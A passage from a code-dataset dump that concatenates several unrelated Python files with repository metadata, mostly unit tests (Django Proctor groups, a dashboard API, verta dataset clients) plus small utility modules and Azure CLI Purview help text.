] | 5 | 2017-12-07T16:41:08.000Z | 2022-03-22T21:17:52.000Z | proctor/tests/test_groups.py | rhornik-indeed/django-proctor | f78b6daaeed8e1ce1235d8abb94722ed84c50e8d | [
"Apache-2.0"
] | 8 | 2017-03-13T01:08:40.000Z | 2022-03-22T21:18:57.000Z | from __future__ import absolute_import, unicode_literals
from proctor.groups import ProctorGroups, GroupAssignment
class TestProctorGroups:
def test_string_encoding_for_valid_group(self):
# Test valid single test case
groups = ProctorGroups({"test_one": GroupAssignment(group="test", value=0, payload="")})
assert groups.get_group_string_list() == ["test_one0"]
def test_string_encoding_for_null_group(self):
# Test unassigned group. Exercises None type comparison in py3.
groups = ProctorGroups({"test_two": GroupAssignment(group=None, value=None, payload=None)})
assert groups.get_group_string_list() == []
def test_string_encoding_for_inactive_group(self):
groups = ProctorGroups({"test_two": GroupAssignment(group=None, value=-1, payload=None)})
assert groups.get_group_string_list() == []
| 41.714286 | 99 | 0.730594 | 105 | 876 | 5.771429 | 0.390476 | 0.034653 | 0.064356 | 0.10396 | 0.485149 | 0.366337 | 0.316832 | 0.316832 | 0 | 0 | 0 | 0.005479 | 0.166667 | 876 | 20 | 100 | 43.8 | 0.824658 | 0.101598 | 0 | 0.166667 | 0 | 0 | 0.047194 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | false | 0.333333 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fb6e83700dccaa1f42cd52d508854b879ff7516e | 2,222 | py | Python | tests/test_main.py | terrorizer1980/Dashboard-api | f71c9354caece9d2e84b08f29bd3a874a94b5333 | [
"MIT"
] | 6 | 2019-08-24T17:52:22.000Z | 2020-05-28T00:03:39.000Z | tests/test_main.py | terrorizer1980/Dashboard-api | f71c9354caece9d2e84b08f29bd3a874a94b5333 | [
"MIT"
] | 133 | 2020-07-25T18:20:59.000Z | 2022-03-28T08:03:35.000Z | tests/test_main.py | terrorizer1980/Dashboard-api | f71c9354caece9d2e84b08f29bd3a874a94b5333 | [
"MIT"
] | 5 | 2019-06-18T15:31:11.000Z | 2020-11-22T00:35:13.000Z | import pytest
# Link what responses we can to one point to keep changes easier
from Utils.Responses import successful_action_response, no_reply_response
from tests import tools
noauth_client = tools.generate_noauth_client()
# TODO: Make a test for when the bot is offline
class TestOther():
def test_metrics(self):
resp = noauth_client.get("/api/metrics")
tools.assure_ok_response(resp)
# Basic sanity check
assert resp.headers["content-type"] == "text/plain; charset=utf-8"
def test_spinning(self):
auth_client = tools.generate_authed_client()
resp = auth_client.get("/api/spinning")
tools.assure_ok_response(resp)
tools.assure_bool(resp)
# See pytest.ini on how to run this test
@pytest.mark.bot_offline
def test_bot_offline(self):
# Test to assure the API handles a bot outage properly
resp = tools.make_bot_request("/api/whoami")
tools.assure_identical_response(resp, no_reply_response)
class TestMain():
def test_logout_noauth(self): tools.assure_noauth(noauth_client.get("/api/logout"))
def test_logout(self):
auth_client = tools.generate_authed_client()
resp = auth_client.get("/api/logout")
tools.assure_ok_response(resp)
assert resp.content == successful_action_response.body
# Assure that the session was cleared properly
assert resp.cookies.items() == []
def test_whoami_noauth(self): tools.assure_noauth(noauth_client.get("/api/whoami"))
def test_whoami(self):
resp = tools.make_bot_request("/api/whoami")
tools.assure_ok_response(resp)
# Make sure all expected fields exist, and that they are the right type
resp: dict = resp.json()
tools.assure_fields_and_types(resp, ["username", "discrim", "avatar_url", "bot_admin_status"])
# Make sure the discriminator can always be converted into a number
assert int(resp["discrim"])
def test_generalinfo(self):
resp = tools.make_bot_request("/api/general_info")
tools.assure_ok_response(resp)
tools.assure_fields_and_types(resp.json(), ["languages", "logging"])
| 30.438356 | 102 | 0.684968 | 296 | 2,222 | 4.922297 | 0.381757 | 0.083047 | 0.041181 | 0.072066 | 0.350721 | 0.306795 | 0.274537 | 0.201784 | 0.201784 | 0.080988 | 0 | 0.000575 | 0.217822 | 2,222 | 72 | 103 | 30.861111 | 0.837745 | 0.180018 | 0 | 0.243243 | 0 | 0 | 0.109272 | 0 | 0 | 0 | 0 | 0.013889 | 0.108108 | 1 | 0.216216 | false | 0 | 0.081081 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb71e39b35c9ac0181734fb28f42bdf23dc0f768 | 341 | py | Python | pymontecarlo_gui/conftest.py | pymontecarlo/pymontecarlo-gui | 1b3c37d4b634a85c63f23d27ea8bd79bf5a43a2f | [
"Apache-2.0"
] | null | null | null | pymontecarlo_gui/conftest.py | pymontecarlo/pymontecarlo-gui | 1b3c37d4b634a85c63f23d27ea8bd79bf5a43a2f | [
"Apache-2.0"
] | 2 | 2016-05-16T10:19:56.000Z | 2021-12-29T15:16:20.000Z | pymontecarlo_gui/conftest.py | pymontecarlo/pymontecarlo-gui | 1b3c37d4b634a85c63f23d27ea8bd79bf5a43a2f | [
"Apache-2.0"
] | null | null | null | """"""
# Standard library modules.
# Third party modules.
import pytest
# Local modules.
from pymontecarlo.options import Material
# Globals and constants variables.
@pytest.fixture
def materials():
return [
Material.pure(13),
Material.from_formula("Al2O3"),
Material("foo", {29: 0.5, 28: 0.5}, 2.0),
]
| 16.238095 | 49 | 0.642229 | 41 | 341 | 5.317073 | 0.731707 | 0.018349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.219941 | 341 | 20 | 50 | 17.05 | 0.766917 | 0.27566 | 0 | 0 | 0 | 0 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | true | 0 | 0.222222 | 0.111111 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
fb73637b2895a187a2f21faf7d47c3c7415ab5c6 | 1,524 | py | Python | lakepowell/catch_per_unit_effort_functions.py | mrwigington/LakePowell | 8d553231f07cc4f00d51058b357c73a0ac0a45ae | [
"MIT"
] | null | null | null | lakepowell/catch_per_unit_effort_functions.py | mrwigington/LakePowell | 8d553231f07cc4f00d51058b357c73a0ac0a45ae | [
"MIT"
] | null | null | null | lakepowell/catch_per_unit_effort_functions.py | mrwigington/LakePowell | 8d553231f07cc4f00d51058b357c73a0ac0a45ae | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 31 13:19:05 2020
@author: aquag
"""
#maybe make a variable.
#availiabel variables
#time frame
#year
#month
#trip?
#biotic factor
def calc_catch_per_unit_effort(data,time, bio_fac):
#pull weights
#or this should be length?
#divide by hours = 32?? overnight???
#get average number of hours
#divide by number of nets = number of sites = 32??
#do this by taking the site column
#pull out and coutn unique values
#also get avearge net size
#have this as a sencondary caracterstic based on what gets imported
#time period
# so sort out the data based on what they send
if time == 'year':
pass
elif time == 'month':
pass
elif time == 'trip':
pass
else:
#incorect variable, spit out error
pass
#add up variable(fish, length, weight)
if bio_fac == 'fish':
#add up number of fish
calac_varaible = len(data)
pass
elif bio_fac == 'length':
length = data['Length']
calac_varaible = sum(length)
pass
elif bio_fac == 'weight':
weights = data["Weight"]
#add together
calac_varaible = sum(weights)
else:
#error, return error message?
pass
#then pull the variable they want
#divide by number of sites in colection
sites = data['Site']
total_sites = len(set(sites))
Catch_per = calac_varaible / total_sites
return Catch_per | 22.746269 | 71 | 0.604987 | 204 | 1,524 | 4.441176 | 0.514706 | 0.04415 | 0.030905 | 0.03532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 0.308399 | 1,524 | 67 | 72 | 22.746269 | 0.843454 | 0 | 0 | 0.36 | 0 | 0 | 0.057915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.28 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
fb85b33219bb9ececc67caba5f6854249b53d714 | 386 | py | Python | maze_solver/__main__.py | MaciejChoromanski/maze-solver | 9a1e22f1c9d7b91f73fafde13240685a4ea72cd9 | [
"MIT"
] | null | null | null | maze_solver/__main__.py | MaciejChoromanski/maze-solver | 9a1e22f1c9d7b91f73fafde13240685a4ea72cd9 | [
"MIT"
] | 4 | 2021-06-08T22:13:30.000Z | 2022-03-12T00:45:44.000Z | maze_solver/__main__.py | MaciejChoromanski/maze-solver | 9a1e22f1c9d7b91f73fafde13240685a4ea72cd9 | [
"MIT"
] | null | null | null | from utils import (
get_input_data,
solve_maze_from_file,
solve_test_mazes,
display_help,
)
def main() -> None:
"""Entry point of the script"""
mode, value = get_input_data()
if mode == 'file':
solve_maze_from_file(value)
elif mode == 'test':
solve_test_mazes()
else:
display_help()
if __name__ == '__main__':
main()
| 16.782609 | 35 | 0.603627 | 49 | 386 | 4.265306 | 0.55102 | 0.076555 | 0.114833 | 0.162679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.279793 | 386 | 22 | 36 | 17.545455 | 0.751799 | 0.064767 | 0 | 0 | 0 | 0 | 0.04507 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | true | 0 | 0.0625 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb8a931bfdca8f863e468903e297bee93af623ba | 857 | py | Python | cumulusci/tasks/metadata_etl/__init__.py | hamedizadpanah-ibm/CumulusCI | eb93723e2da1ca66a7639b3197e6fab02d1bd24a | [
"BSD-3-Clause"
] | 1 | 2020-08-08T03:55:21.000Z | 2020-08-08T03:55:21.000Z | cumulusci/tasks/metadata_etl/__init__.py | Julian88Tex/CumulusCI | 82d5fab71b61fbab53c1b5fc6001452fa3f97da8 | [
"BSD-3-Clause"
] | null | null | null | cumulusci/tasks/metadata_etl/__init__.py | Julian88Tex/CumulusCI | 82d5fab71b61fbab53c1b5fc6001452fa3f97da8 | [
"BSD-3-Clause"
] | null | null | null | from cumulusci.tasks.metadata_etl.base import (
BaseMetadataETLTask,
BaseMetadataSynthesisTask,
BaseMetadataTransformTask,
MetadataSingleEntityTransformTask,
MetadataOperation,
)
from cumulusci.tasks.metadata_etl.duplicate_rules import SetDuplicateRuleStatus
from cumulusci.tasks.metadata_etl.layouts import AddRelatedLists
from cumulusci.tasks.metadata_etl.permissions import AddPermissionSetPermissions
from cumulusci.tasks.metadata_etl.value_sets import AddValueSetEntries
from cumulusci.tasks.metadata_etl.sharing import SetOrgWideDefaults
flake8 = (
BaseMetadataETLTask,
BaseMetadataSynthesisTask,
BaseMetadataTransformTask,
MetadataSingleEntityTransformTask,
AddRelatedLists,
AddPermissionSetPermissions,
AddValueSetEntries,
SetOrgWideDefaults,
MetadataOperation,
SetDuplicateRuleStatus,
)
| 32.961538 | 80 | 0.833139 | 65 | 857 | 10.861538 | 0.384615 | 0.110482 | 0.152975 | 0.220963 | 0.246459 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00133 | 0.12252 | 857 | 25 | 81 | 34.28 | 0.9375 | 0 | 0 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb8e46faee804c97f7f2637c49b375cfb9527661 | 70 | py | Python | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | from .widget import WidgetExtension as widget
_all_ = [
widget
]
| 11.666667 | 45 | 0.714286 | 8 | 70 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228571 | 70 | 5 | 46 | 14 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb8eac16fa1ef02a6c1ee068ed789b4711c48526 | 5,454 | py | Python | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['purview'] = '''
type: group
short-summary: Manage Purview
'''
helps['purview account'] = """
type: group
short-summary: Manage account with purview
"""
helps['purview account list'] = """
type: command
short-summary: "List accounts in ResourceGroup And List accounts in Subscription."
examples:
- name: Accounts_ListByResourceGroup
text: |-
az purview account list --resource-group "SampleResourceGroup"
- name: Accounts_ListBySubscription
text: |-
az purview account list
"""
helps['purview account show'] = """
type: command
short-summary: "Get an account."
examples:
- name: Accounts_Get
text: |-
az purview account show --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account create'] = """
type: command
short-summary: "Create an account."
parameters:
- name: --sku
short-summary: "Gets or sets the Sku."
long-summary: |
Usage: --sku capacity=XX name=XX
capacity: Gets or sets the sku capacity. Possible values include: 4, 16
name: Gets or sets the sku name.
examples:
- name: Accounts_CreateOrUpdate
text: |-
az purview account create --location "West US 2" --managed-resource-group-name "custom-rgname" --sku \
name="Standard" capacity=4 --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account update'] = """
type: command
short-summary: "Updates an account."
examples:
- name: Accounts_Update
text: |-
az purview account update --name "account1" --tags newTag="New tag value." --resource-group \
"SampleResourceGroup"
"""
helps['purview account delete'] = """
type: command
short-summary: "Deletes an account resource."
examples:
- name: Accounts_Delete
text: |-
az purview account delete --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account add-root-collection-admin'] = """
type: command
short-summary: "Add the administrator for root collection associated with this account."
examples:
- name: Accounts_AddRootCollectionAdmin
text: |-
az purview account add-root-collection-admin --name "account1" --object-id \
"7e8de0e7-2bfc-4e1f-9659-2a5785e4356f" --resource-group "SampleResourceGroup"
"""
helps['purview account list-key'] = """
type: command
short-summary: "List the authorization keys associated with this account."
examples:
- name: Accounts_ListKeys
text: |-
az purview account list-key --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account wait'] = """
type: command
short-summary: Place the CLI in a waiting state until a condition of the purview account is met.
examples:
- name: Pause executing next line of CLI script until the purview account is successfully created.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --created
- name: Pause executing next line of CLI script until the purview account is successfully updated.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --updated
- name: Pause executing next line of CLI script until the purview account is successfully deleted.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --deleted
"""
helps['purview default-account'] = """
type: group
short-summary: Manage default account with purview
"""
helps['purview default-account show'] = """
type: command
short-summary: "Get the default account for the scope."
examples:
- name: DefaultAccounts_Get
text: |-
az purview default-account show --scope "12345678-1234-1234-12345678abc" --scope-tenant-id \
"12345678-1234-1234-12345678abc" --scope-type "Tenant"
"""
helps['purview default-account remove'] = """
type: command
short-summary: "Removes the default account from the scope."
examples:
- name: DefaultAccounts_Remove
text: |-
az purview default-account remove --scope "12345678-1234-1234-12345678abc" --scope-tenant-id \
"12345678-1234-1234-12345678abc" --scope-type "Tenant"
"""
helps['purview default-account set'] = """
type: command
short-summary: "Sets the default account for the scope."
examples:
- name: DefaultAccounts_Set
text: |-
az purview default-account set --account-name "myDefaultAccount" --resource-group "rg-1" --scope \
"12345678-1234-1234-12345678abc" --scope-tenant-id "12345678-1234-1234-12345678abc" --scope-type "Tenant" \
--subscription-id "12345678-1234-1234-12345678aaa"
"""
| 35.881579 | 117 | 0.642831 | 598 | 5,454 | 5.842809 | 0.262542 | 0.096165 | 0.052089 | 0.07241 | 0.550944 | 0.426445 | 0.361191 | 0.314253 | 0.242129 | 0.210647 | 0 | 0.047832 | 0.221856 | 5,454 | 151 | 118 | 36.119205 | 0.775448 | 0.086175 | 0 | 0.435484 | 0 | 0.056452 | 0.934245 | 0.137141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.008065 | 0 | 0.008065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb901ce473e70128b293cb2d80e0968b8e60c823 | 239 | py | Python | src/backend/tests/conftest.py | rollsroycedev/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | 1 | 2021-09-07T14:53:16.000Z | 2021-09-07T14:53:16.000Z | src/backend/tests/conftest.py | rollsroycedev/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | 24 | 2021-07-22T14:17:26.000Z | 2022-02-14T09:42:12.000Z | src/backend/tests/conftest.py | rropen/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | null | null | null | import pytest
from starlette.testclient import TestClient
# from mec.models import Meeting
from mec.main import app
# Creates a new connection
@pytest.fixture(scope="module")
def test_app():
client = TestClient(app)
yield client
| 19.916667 | 43 | 0.76569 | 33 | 239 | 5.515152 | 0.636364 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158996 | 239 | 11 | 44 | 21.727273 | 0.905473 | 0.230126 | 0 | 0 | 0 | 0 | 0.033149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fb9702db1ce869454c704ccbdc809698afa5b512 | 162 | py | Python | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | null | null | null | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | null | null | null | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | 3 | 2019-06-20T18:06:01.000Z | 2020-03-18T18:11:02.000Z | from backend.app import create_app
brfc = create_app()
# set as PYTHONPATH the backend folder
if __name__ == "__main__":
brfc.run(host="0.0.0.0", port=2323)
| 23.142857 | 39 | 0.716049 | 27 | 162 | 3.925926 | 0.703704 | 0.056604 | 0.056604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0.154321 | 162 | 6 | 40 | 27 | 0.715328 | 0.222222 | 0 | 0 | 0 | 0 | 0.120968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fbabd4486cddab3f8e2b9333ae23c5ad90877d89 | 21,417 | py | Python | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | import pytest
import six
import os
import time
import shutil
from . import utils
import verta
import verta.dataset
from verta._internal_utils import _utils
from verta._dataset import Dataset, DatasetVersion, S3DatasetVersionInfo, FilesystemDatasetVersionInfo
from verta._protos.public.modeldb import DatasetService_pb2 as _DatasetService
from verta._protos.public.modeldb import DatasetVersionService_pb2 as _DatasetVersionService
DEFAULT_S3_TEST_BUCKET = "bucket"
DEFAULT_S3_TEST_OBJECT = "object"
DEFAULT_GOOGLE_APPLICATION_CREDENTIALS = "credentials.json"
# for `tags` typecheck tests
TAG = "my-tag"
@pytest.fixture(scope='session')
def s3_bucket():
return os.environ.get("VERTA_S3_TEST_BUCKET", DEFAULT_S3_TEST_BUCKET)
@pytest.fixture(scope='session')
def s3_object():
return os.environ.get("VERTA_S3_TEST_OBJECT", DEFAULT_S3_TEST_OBJECT)
@pytest.fixture(scope='session')
def bq_query():
return (
"SELECT id, `by`, score, time, time_ts, title, url, text, deleted, dead, descendants, author"
" FROM `bigquery-public-data.hacker_news.stories`"
" LIMIT 1000"
)
@pytest.fixture(scope='session')
def bq_location():
return "US"
class TestBaseDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestBaseDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
@pytest.mark.parametrize("tags", [TAG, [TAG]])
@pytest.mark.skip(reason="api no longer supported by backend")
def test_tags_is_list_of_str(self, client, created_datasets, tags):
dataset = client.set_dataset(tags=tags)
created_datasets.append(dataset)
version = dataset.create_version("conftest.py", tags=tags)
endpoint = "{}://{}/api/v1/modeldb/dataset-version/getDatasetVersionTags".format(
client._conn.scheme,
client._conn.socket,
)
response = verta._internal_utils._utils.make_request("GET", endpoint, client._conn, params={'id': version.id})
verta._internal_utils._utils.raise_for_http_error(response)
assert response.json().get('tags', []) == [TAG]
# TODO: not implemented
class TestRawDatasets:
pass
# TODO: not implemented
class TestRawDatasetVersions:
pass
class TestPathDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestClientDatasetFunctions:
def test_creation_from_scratch_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
same_dataset = client.set_dataset(id=dataset.id)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
def test_get_dataset_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
same_dataset = client.get_dataset(id=dataset.id)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
same_dataset = client.get_dataset(name=dataset.name)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
def test_find_datasets_by_fuzzy_name(self, client, created_datasets):
now = str(_utils.now())
created_datasets.append(client.set_dataset(now+" appl"))
created_datasets.append(client.set_dataset(now+" Appl"))
created_datasets.append(client.set_dataset(now+" Apple"))
datasets = client.find_datasets(name=now+" Appl")
assert len(datasets) == 3
@pytest.mark.skip("See #1285")
def test_find_datasets_client_api(self, client, created_datasets):
tags = ["test1a-{}".format(_utils.now()), "test1b-{}".format(_utils.now())]
dataset1 = client.set_dataset(type="big query", tags=tags)
created_datasets.append(dataset1)
assert dataset1.id
single_tag = ["test2-{}".format(_utils.now())]
dataset2 = client.set_dataset(type="s3", tags=single_tag)
created_datasets.append(dataset2)
assert dataset2.id
# TODO: update once RAW is supported
# dataset3 = client.set_dataset(type="raw")
# created_datasets.append(dataset3)
# assert dataset3._dataset_type == _DatasetService.DatasetTypeEnum.RAW
# assert dataset3.id
# datasets = client.find_datasets()
# assert len(datasets) == 3
# assert datasets[0].id == dataset1.id
# assert datasets[1].id == dataset2.id
# assert datasets[2].id == dataset3.id
datasets = client.find_datasets(tags=tags)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
# str arg automatically wrapped into list by client
datasets = client.find_datasets(tags=single_tag[0])
assert len(datasets) == 1
assert datasets[0].id == dataset2.id
datasets = client.find_datasets(name=dataset1.name)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
datasets = client.find_datasets(dataset_ids=[dataset1.id, dataset2.id], name=dataset1.name)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
# test sorting ascending
datasets = client.find_datasets(
dataset_ids=[dataset1.id, dataset2.id],
sort_key="time_created", ascending=True,
)
assert [dataset.id for dataset in datasets] == [dataset1.id, dataset2.id]
# and descending
datasets = client.find_datasets(
dataset_ids=[dataset1.id, dataset2.id],
sort_key="time_created", ascending=False,
)
assert [dataset.id for dataset in datasets] == [dataset2.id, dataset1.id]
class TestClientDatasetVersionFunctions:
def test_creation_from_scratch(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version = dataset.create_version(__file__)
assert version.id
def test_creation_by_id(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version = dataset.create_version(__file__)
assert version.id
same_version = client.get_dataset_version(id=version.id)
assert version.id == same_version.id
def test_get_versions(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version1 = dataset.create_version(path=__file__)
assert version1.id
version2 = dataset.create_version(path=pytest.__file__)
assert version2.id
versions = dataset.get_all_versions()
